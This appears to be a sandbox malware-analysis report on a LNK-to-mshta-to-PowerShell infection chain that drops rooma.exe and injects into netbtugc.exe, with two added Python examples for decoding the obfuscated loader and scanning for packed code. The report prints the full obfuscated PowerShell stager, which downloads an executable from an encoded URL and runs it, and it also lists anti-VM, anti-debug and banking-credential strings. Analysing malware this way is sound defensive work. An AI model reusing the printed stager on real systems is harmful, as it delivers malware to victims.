Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_009C47A2 push es; iretd 7_2_009C47AA
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_009B17E5 push ebp; retf 003Fh 7_2_009B17E6
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015909AD push ecx; mov dword ptr [esp], ecx 7_2_015909B6
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe Code function: 9_2_04AC9E05 push esp; ret 9_2_04AC9E06
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe Code function: 9_2_04AE3816 push 00000038h; iretd 9_2_04AE381A
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe Code function: 9_2_04ADF992 push ebx; iretd 9_2_04ADFB5C
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe Code function: 9_2_04ADE1EE pushad ; retf 9_2_04ADE1EF
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe Code function: 9_2_04ADDB88 push ebx; ret 9_2_04ADDB89
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe Code function: 9_2_04AE8BD4 push FFFFFFBAh; ret 9_2_04AE8BD6
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe Code function: 9_2_04ADFB35 push ebx; iretd 9_2_04ADFB5C
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02EE09AD push ecx; mov dword ptr [esp], ecx 10_2_02EE09B6
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02562238 pushad ; iretd 10_2_02562239
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_0256101F push es; iretd 10_2_02561027
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02551126 push esp; ret 10_2_02551127
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_0256D1B0 push es; ret 10_2_0256D1D0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_0256550F pushad ; retf 10_2_02565510
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_0256AB37 push 00000038h; iretd 10_2_0256AB3B
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02566E56 push ebx; iretd 10_2_02566E7D
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_0256FEF5 push FFFFFFBAh; ret 10_2_0256FEF7
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02560EAB push ebp; retf 10_2_02560EAC
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_0255FFA0 push esi; iretd 10_2_0255FFA5
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02566CB3 push ebx; iretd 10_2_02566E7D
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe Code function: 14_2_023A7A15 push eax; retf 14_2_023A7A14
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe Code function: 14_2_023B2A5A push esi; iretd 14_2_023B2A5F
Source: rooma.exe.5.dr Static PE information: section name: .text entropy: 7.994482090735877
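
The powershell.exe command line listed at the top of this section hides every string behind its own decoder, KgQIevZJx, which subtracts a constant (47079) from each integer in an array and casts the result to a character; the file extensions it dispatches on, the Net.WebClient class and the download URL are all passed that way. The Python below is an added example written for this page, not code from the report or from Joe Sandbox: it locates the decoder in the captured command line, recovers the constant, rewrites each call to the literal it produces and then pulls the URL, quoted file names and loader behaviours out of the decoded text. The sample input is the report's own command line with the powershell.exe path dropped and a line break between function definitions; the function and field names of the decoder are the example's own.

```python
import re

# Constructed input: the obfuscated command line captured above (mshta.exe ->
# powershell.exe), copied from the report with the powershell.exe path dropped
# and a line break inserted between function definitions for readability.
SAMPLE_CMDLINE = r"""
-ExecutionPolicy UnRestricted function LQhlh($iAXOUnjQ, $bjGcHEb){[IO.File]::WriteAllBytes($iAXOUnjQ, $bjGcHEb)};
function zkkoODnkdOXlr($iAXOUnjQ){if($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47179,47187,47187))) -eq $True){rundll32.exe $iAXOUnjQ }elseif($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47191,47194,47128))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $iAXOUnjQ}elseif($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47188,47194,47184))) -eq $True){misexec /qn /i $iAXOUnjQ}else{Start-Process $iAXOUnjQ}};
function fbUysIvJpUzDJbgt($WeuPtAwBrGuTyyLeSBEJ){$TPKepUYDmoAFjOHRfuEf = New-Object (KgQIevZJx @(47157,47180,47195,47125,47166,47180,47177,47146,47187,47184,47180,47189,47195));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$bjGcHEb = $TPKepUYDmoAFjOHRfuEf.DownloadData($WeuPtAwBrGuTyyLeSBEJ);return $bjGcHEb};
function KgQIevZJx($eTHmOcKqIU){$kIWXaGUQZYbt=47079;$PDFpjjruzXwZezIX=$Null;foreach($QNJiuRDs in $eTHmOcKqIU){$PDFpjjruzXwZezIX+=[char]($QNJiuRDs-$kIWXaGUQZYbt)};return $PDFpjjruzXwZezIX};
function iMoBwPUgEkDDhYs(){$bzNVNMxsa = $env:AppData + '\';$fLaod = $bzNVNMxsa + 'rooma.exe'; if (Test-Path -Path $fLaod){zkkoODnkdOXlr $fLaod;}Else{ $movKnuBo = fbUysIvJpUzDJbgt (KgQIevZJx @(47183,47195,47195,47191,47137,47126,47126,47129,47127,47125,47135,47133,47125,47128,47129,47135,47125,47129,47129,47130,47126,47193,47190,47190,47188,47126,47193,47190,47190,47188,47176,47125,47180,47199,47180));LQhlh $fLaod $movKnuBo;zkkoODnkdOXlr $fLaod;};;;;}iMoBwPUgEkDDhYs;
"""

# Shape of the decoder: "function NAME($arg){$KEY=NNNN; ... [char]($x-$KEY)".
DECODER_RE = re.compile(
    r"function\s+(\w+)\(\$\w+\)\{\$(\w+)=(\d+);.*?\[char\]\(\$\w+-\$\2\)", re.S)


def find_decoder(script):
    """Return (decoder function name, subtraction constant); raise if no such function."""
    m = DECODER_RE.search(script)
    if not m:
        raise ValueError("no subtract-constant string decoder found")
    return m.group(1), int(m.group(3))


def decode_array(values, offset):
    """Reimplements the decoder: each integer minus the constant is one character."""
    return "".join(chr(int(v) - offset) for v in values)


def deobfuscate(script):
    """Replace every NAME @(n,n,...) call with the PowerShell literal it decodes to.

    Returns (rewritten script, decoded strings in order of appearance).
    """
    name, offset = find_decoder(script)
    decoded = []
    call_re = re.compile(re.escape(name) + r"\s+@\(\s*([\d,\s]*\d)\s*\)")

    def replace(m):
        numbers = [v for v in re.split(r"[\s,]+", m.group(1)) if v]
        text = decode_array(numbers, offset)
        decoded.append(text)
        return "'" + text.replace("'", "''") + "'"   # single-quoted literal

    return call_re.sub(replace, script), decoded


# Loader behaviours the report flags; checked on the decoded text because the
# originals were hidden behind the integer arrays.
INDICATORS = ("-ExecutionPolicy", "Net.WebClient", "DownloadData",
              "WriteAllBytes", "$env:AppData", "Start-Process", "rundll32.exe")


def extract_iocs(script):
    """Pull URLs, quoted file names and loader behaviours out of a decoded script."""
    clean, _ = deobfuscate(script)
    return {
        "urls": re.findall(r"https?://[^\s'\"()]+", clean),
        "files": re.findall(r"'([^'/:]+\.(?:exe|dll|ps1|msi))'", clean),
        "indicators": [i for i in INDICATORS if i in clean],
    }


if __name__ == "__main__":
    script, strings = deobfuscate(SAMPLE_CMDLINE)
    print(script)
    print("decoded strings:", strings)
    print("iocs:", extract_iocs(SAMPLE_CMDLINE))
```

Run against the arrays on this page, the calls resolve to the three extensions the dispatcher tests for, the Net.WebClient class used for the download, and the URL rooma.exe is fetched from before being written to %AppData%; the misspelled "misexec" branch is left exactly as captured because it is what the loader actually executes. Other subtract- or XOR-constant decoders of the same shape can be handled by adjusting DECODER_RE and decode_array.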

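The push/ret, push/retf and push/iretd listings for rooma.exe, netbtugc.exe and TmjHHkXnMrncRmISMzN.exe, together with the .text entropy of 7.99 for rooma.exe, are the static signs of a packed or self-decrypting payload: a push immediately followed by a return is an indirect jump that trips up linear disassembly, and a code section whose bytes are almost uniformly distributed is not compiler output. The Python below is an added example, not part of the report: it computes Shannon entropy the way PE triage tools do and sweeps a byte buffer for push/return pairs, printing them in the same form the report uses. The byte sample is constructed for the example from the instruction shapes listed above; it is not data from any of the dropped files.

```python
import math
from collections import Counter


def shannon_entropy(data):
    """Shannon entropy in bits per byte: 0.0 for a constant buffer, 8.0 for uniform bytes.

    Compiled x86 code usually sits around 6; values close to 8 mean packed or encrypted data.
    """
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


# 32-bit opcodes that make up the report's "push X; ret/retf/iretd" findings.
PUSH_REG = {0x50 + i: "push " + r for i, r in
            enumerate(("eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"))}
PUSH_SEG = {0x06: "push es", 0x0E: "push cs", 0x16: "push ss", 0x1E: "push ds"}
RETURNS = {0xC3: "ret", 0xC2: "ret", 0xCB: "retf", 0xCA: "retf", 0xCF: "iretd"}


def scan_push_ret(code, base=0):
    """Linear byte sweep for a push immediately followed by a return instruction.

    Returns [(address, "push ...; ret ...")]. Like the sandbox's own listing this is a
    heuristic: every byte offset is tested, so operand bytes can produce false hits.
    """
    hits = []
    for i, op in enumerate(code):
        if op in PUSH_REG or op in PUSH_SEG or op == 0x60:          # 0x60 = pushad
            mnem, nxt = PUSH_REG.get(op) or PUSH_SEG.get(op) or "pushad", i + 1
        elif op == 0x6A and i + 1 < len(code):                       # push imm8, sign-extended
            imm = code[i + 1] - 0x100 if code[i + 1] & 0x80 else code[i + 1]
            mnem, nxt = f"push {imm & 0xFFFFFFFF:08X}h", i + 2
        else:
            continue
        if nxt < len(code) and code[nxt] in RETURNS:
            ret = RETURNS[code[nxt]]
            if code[nxt] in (0xC2, 0xCA) and nxt + 2 < len(code):  # ret/retf imm16
                ret += f" {int.from_bytes(code[nxt + 1:nxt + 3], 'little'):04X}h"
            hits.append((base + i, f"{mnem}; {ret}"))
    return hits


# Constructed sample: a normal function prologue, the gadget shapes listed in the
# report for rooma.exe and netbtugc.exe, and an ordinary "xor eax,eax; ret".
SAMPLE_CODE = bytes.fromhex(
    "55 8B EC 83 EC 10"   # push ebp; mov ebp,esp; sub esp,10h  (push not followed by ret)
    "54 C3"               # push esp; ret
    "6A 38 CF"            # push 00000038h; iretd
    "60 CB"               # pushad; retf
    "6A BA C3"            # push FFFFFFBAh; ret
    "55 CA 3F 00"         # push ebp; retf 003Fh
    "06 CF"               # push es; iretd
    "33 C0 C3"            # xor eax,eax; ret
)


def triage(section_bytes, base=0, entropy_threshold=7.0):
    """Summarise one section the way the report does: entropy plus push/return gadgets."""
    ent = shannon_entropy(section_bytes)
    return {"entropy": round(ent, 3),
            "high_entropy": ent >= entropy_threshold,
            "push_ret_hits": scan_push_ret(section_bytes, base)}


if __name__ == "__main__":
    for addr, text in scan_push_ret(SAMPLE_CODE, base=0x009B0000):
        print(f"{addr:08X}  {text}")
    print(triage(SAMPLE_CODE))
```

To run this against a real dropped file, feed each section's raw bytes and load address, for example section.get_data() and section.VirtualAddress + pe.OPTIONAL_HEADER.ImageBase from pefile. A code section above roughly 7.0 bits per byte, especially with a cluster of push/return hits, should be treated as packed and unpacked (or dumped from memory, as the sandbox's memory dumps allow) before any further static analysis.
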
Persistence and Installation Behavior

Source: LNK file Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file Process created: C:\Windows\System32\mshta.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\rooma.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netbtugc.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0160D1C0 rdtsc 7_2_0160D1C0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1927
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1425
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4299
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5524
Source: C:\Windows\SysWOW64\netbtugc.exe Window / User API: threadDelayed 1205
Source: C:\Windows\SysWOW64\netbtugc.exe Window / User API: threadDelayed 8766
Source: C:\Users\user\AppData\Roaming\rooma.exe API coverage: 0.8 %
Source: C:\Windows\SysWOW64\netbtugc.exe API coverage: 3.0 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7224 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7508 Thread sleep time: -14757395258967632s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7604 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7720 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\netbtugc.exe TID: 8036 Thread sleep count: 1205 > 30
Source: C:\Windows\SysWOW64\netbtugc.exe TID: 8036 Thread sleep time: -2410000s >= -30000s
Source: C:\Windows\SysWOW64\netbtugc.exe TID: 8036 Thread sleep count: 8766 > 30
Source: C:\Windows\SysWOW64\netbtugc.exe TID: 8036 Thread sleep time: -17532000s >= -30000s
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe TID: 8048 Thread sleep time: -70000s >= -30000s
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe TID: 8048 Thread sleep count: 33 > 30
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe TID: 8048 Thread sleep time: -49500s >= -30000s
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe TID: 8048 Thread sleep count: 36 > 30
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe TID: 8048 Thread sleep time: -36000s >= -30000s
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\netbtugc.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_0256BAB0 FindFirstFileW,FindNextFileW,FindClose, 10_2_0256BAB0
Source: powershell.exe, 00000005.00000002.1464884328.0000021E7C6DE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}11ee-8
Source: F56GKLK7U4.10.dr Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: F56GKLK7U4.10.dr Binary or memory string: discord.comVMware20,11696494690f
Source: F56GKLK7U4.10.dr Binary or memory string: AMC password management pageVMware20,11696494690
Source: F56GKLK7U4.10.dr Binary or memory string: outlook.office.comVMware20,11696494690s
Source: F56GKLK7U4.10.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: F56GKLK7U4.10.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: F56GKLK7U4.10.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: F56GKLK7U4.10.dr Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: F56GKLK7U4.10.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: netbtugc.exe, 0000000A.00000002.3833651753.000000000288E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^)w
Source: F56GKLK7U4.10.dr Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: F56GKLK7U4.10.dr Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: F56GKLK7U4.10.dr Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: mshta.exe, 00000003.00000003.1487536110.00000237E135D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1490295950.00000237E135D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1489347883.00000237E12E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1486769366.00000237E12DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1486769366.00000237E135D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1490103800.00000237E12E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3113246043.0000024A0885C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: F56GKLK7U4.10.dr Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: mshta.exe, 00000003.00000003.1486769366.00000237E1315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1489347883.00000237E1315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1490103800.00000237E1315000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW@k
Source: F56GKLK7U4.10.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: F56GKLK7U4.10.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: F56GKLK7U4.10.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: netbtugc.exe, 0000000A.00000002.3842765739.00000000078F2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: rs.comVMware20,11696494690
Source: powershell.exe, 00000005.00000002.1464884328.0000021E7C63E000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000F.00000002.1887708377.000002417EBEB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: F56GKLK7U4.10.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: F56GKLK7U4.10.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: F56GKLK7U4.10.dr Binary or memory string: tasks.office.comVMware20,11696494690o
Source: F56GKLK7U4.10.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: F56GKLK7U4.10.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: svchost.exe, 00000008.00000002.3112138074.0000024A0322B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWP
Source: F56GKLK7U4.10.dr Binary or memory string: dev.azure.comVMware20,11696494690j
Source: F56GKLK7U4.10.dr Binary or memory string: global block list test formVMware20,11696494690
Source: powershell.exe, 00000005.00000002.1464884328.0000021E7C6DE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_C
Source: TmjHHkXnMrncRmISMzN.exe, 0000000E.00000002.3834147913.000000000063F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllE
Source: F56GKLK7U4.10.dr Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: F56GKLK7U4.10.dr Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: F56GKLK7U4.10.dr Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: F56GKLK7U4.10.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: F56GKLK7U4.10.dr Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: F56GKLK7U4.10.dr Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: F56GKLK7U4.10.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: F56GKLK7U4.10.dr Binary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Roaming\rooma.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\netbtugc.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_009C7823 LdrLoadDll, 7_2_009C7823
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01597152 mov eax, dword ptr fs:[00000030h] 7_2_01597152
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01596154 mov eax, dword ptr fs:[00000030h] 7_2_01596154
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0158C156 mov eax, dword ptr fs:[00000030h] 7_2_0158C156
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01589148 mov eax, dword ptr fs:[00000030h] 7_2_01589148
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01629179 mov eax, dword ptr fs:[00000030h] 7_2_01629179
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01624144 mov eax, dword ptr fs:[00000030h] 7_2_01624144
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01624144 mov ecx, dword ptr fs:[00000030h] 7_2_01624144
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0158F172 mov eax, dword ptr fs:[00000030h] 7_2_0158F172
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01665152 mov eax, dword ptr fs:[00000030h] 7_2_01665152
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01591131 mov eax, dword ptr fs:[00000030h] 7_2_01591131
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0158B136 mov eax, dword ptr fs:[00000030h] 7_2_0158B136
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01650115 mov eax, dword ptr fs:[00000030h] 7_2_01650115
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015C0124 mov eax, dword ptr fs:[00000030h] 7_2_015C0124
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0163A118 mov ecx, dword ptr fs:[00000030h] 7_2_0163A118
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0163A118 mov eax, dword ptr fs:[00000030h] 7_2_0163A118
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016661E5 mov eax, dword ptr fs:[00000030h] 7_2_016661E5
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015CD1D0 mov eax, dword ptr fs:[00000030h] 7_2_015CD1D0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015CD1D0 mov ecx, dword ptr fs:[00000030h] 7_2_015CD1D0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015C01F8 mov eax, dword ptr fs:[00000030h] 7_2_015C01F8
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016561C3 mov eax, dword ptr fs:[00000030h] 7_2_016561C3
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016561C3 mov eax, dword ptr fs:[00000030h] 7_2_016561C3
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016651CB mov eax, dword ptr fs:[00000030h] 7_2_016651CB
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0160E1D0 mov eax, dword ptr fs:[00000030h] 7_2_0160E1D0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0160E1D0 mov eax, dword ptr fs:[00000030h] 7_2_0160E1D0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0160E1D0 mov ecx, dword ptr fs:[00000030h] 7_2_0160E1D0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0160E1D0 mov eax, dword ptr fs:[00000030h] 7_2_0160E1D0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0160E1D0 mov eax, dword ptr fs:[00000030h] 7_2_0160E1D0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015B51EF mov eax, dword ptr fs:[00000030h] 7_2_015B51EF
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015B51EF mov eax, dword ptr fs:[00000030h] 7_2_015B51EF
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015B51EF mov eax, dword ptr fs:[00000030h] 7_2_015B51EF
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015B51EF mov eax, dword ptr fs:[00000030h] 7_2_015B51EF
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015B51EF mov eax, dword ptr fs:[00000030h] 7_2_015B51EF
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015B51EF mov eax, dword ptr fs:[00000030h] 7_2_015B51EF
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015B51EF mov eax, dword ptr fs:[00000030h] 7_2_015B51EF
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015B51EF mov eax, dword ptr fs:[00000030h] 7_2_015B51EF
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015B51EF mov eax, dword ptr fs:[00000030h] 7_2_015B51EF
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015B51EF mov eax, dword ptr fs:[00000030h] 7_2_015B51EF
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015B51EF mov eax, dword ptr fs:[00000030h] 7_2_015B51EF
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015B51EF mov eax, dword ptr fs:[00000030h] 7_2_015B51EF
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015B51EF mov eax, dword ptr fs:[00000030h] 7_2_015B51EF
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015951ED mov eax, dword ptr fs:[00000030h] 7_2_015951ED
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016411A4 mov eax, dword ptr fs:[00000030h] 7_2_016411A4
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016411A4 mov eax, dword ptr fs:[00000030h] 7_2_016411A4
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016411A4 mov eax, dword ptr fs:[00000030h] 7_2_016411A4
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016411A4 mov eax, dword ptr fs:[00000030h] 7_2_016411A4
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015E7190 mov eax, dword ptr fs:[00000030h] 7_2_015E7190
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0158A197 mov eax, dword ptr fs:[00000030h] 7_2_0158A197
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0158A197 mov eax, dword ptr fs:[00000030h] 7_2_0158A197
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0158A197 mov eax, dword ptr fs:[00000030h] 7_2_0158A197
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015D0185 mov eax, dword ptr fs:[00000030h] 7_2_015D0185
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015AB1B0 mov eax, dword ptr fs:[00000030h] 7_2_015AB1B0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0164C188 mov eax, dword ptr fs:[00000030h] 7_2_0164C188
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0164C188 mov eax, dword ptr fs:[00000030h] 7_2_0164C188
